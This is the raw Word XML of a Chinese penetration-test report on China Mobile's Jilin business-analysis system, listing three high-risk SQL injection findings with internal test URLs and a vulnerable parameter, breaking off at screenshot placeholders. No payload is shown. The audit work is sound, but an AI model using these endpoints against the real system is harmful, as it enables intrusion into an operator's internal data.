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C2EB7" w14:textId="41E8E920" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00A51DCF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>年4月25日中国移动经营分析系统渗透测试漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6338F713" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查综述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B7084" w14:textId="16CA6CDC" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为积极落实中央网信办关于加强信息安全工作的部署，认真贯彻两部委安全考核的要求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>中国移动IT条线全网安全合规检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>要求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00A51DCF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>年4月25日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>吉林移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>安全情况进行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C83EEA" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>本次工作共检查经营分析系统页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>下挂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>子网页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34224B02" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>结果分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A467D1" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="28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对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>业务系统进行安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>测试，发现的应用漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>统计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="767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2709"/>
        <w:gridCol w:w="3685"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00956221" w14:paraId="7053C170" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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8DB4E3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="182F7978" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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渗透安全检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="39B71BD2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8DB4E3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5830E584" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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应用安全评估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3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66E1CE4B" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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高危风险数量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FB40F2D" w14:textId="77777777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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="250BD502" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0B32579" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33B17929" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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中危风险数量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A81EA71" w14:textId="77777777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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="4AE841A7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1F76D0A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C1F0522" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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低危风险数量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D149D6D" w14:textId="77777777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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="327F8CEE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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B2B829A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F3E2D1A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="0000000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风险问题总计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F553282" w14:textId="77777777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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="624E48EC" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000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发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>应用漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>类型汇总</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7655" w:type="dxa"/>
        <w:tblInd w:w="134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9"/>
        <w:gridCol w:w="1823"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="00956221" w14:paraId="3F2C4D4E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="729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705063FE" w14:textId="77777777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序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="182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18F471" w14:textId="77777777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风险</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="510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685EA" w14:textId="77777777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应用漏洞描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="47897ED5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="729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219E8760" w14:textId="77777777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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="182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C1FC7" w14:textId="77777777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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="510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BEE16" w14:textId="3B452171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SQL注入</w:t>
            </w:r>
            <w:r w:rsidR="00F91A92">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="3D59B241" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="729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00D39E1B" w14:textId="77777777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bookmarkStart w:id="0" w:name="OLE_LINK3"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK1"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="182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5146D" w14:textId="77777777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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="510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D704B" w14:textId="6620B554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SQL注入</w:t>
            </w:r>
            <w:r w:rsidR="00F91A92">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00956221" w14:paraId="20CFD115" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="729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35184C9E" w14:textId="77777777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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="182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01D8C" w14:textId="77777777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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="510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BA36A9" w14:textId="0FD94A16" w:rsidR="00956221" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL注入</w:t>
            </w:r>
            <w:r w:rsidR="00F91A92">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Calibri" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F94D2C4" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66959F" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>吉林移动-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>经营分析系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986EE98" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>问题描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现吉林移动-经营分析系统存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C248C" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D92D4D8" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af7"/>
            <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=cityList</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44FC2EF8" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A2CB65" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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测试发现吉林经营分析系统存在SQL注入漏洞，可在4A登录后进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561995E" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>及说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C455D0D" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：打开http://10.161.124.80/iam/v1/#/home/homeManage，进入经营分析系统：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F9483" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="104836BD" wp14:editId="3D68B512">
            <wp:extent cx="5271135" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="5715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48CC" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia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截图2：访问http://10.255.133.186:8888/portal/pages/portal/home/home.jsp ,接口自动发送post请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E128078" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="74F74728" wp14:editId="4D71BEA5">
            <wp:extent cx="5266690" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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74492" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6E9218" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
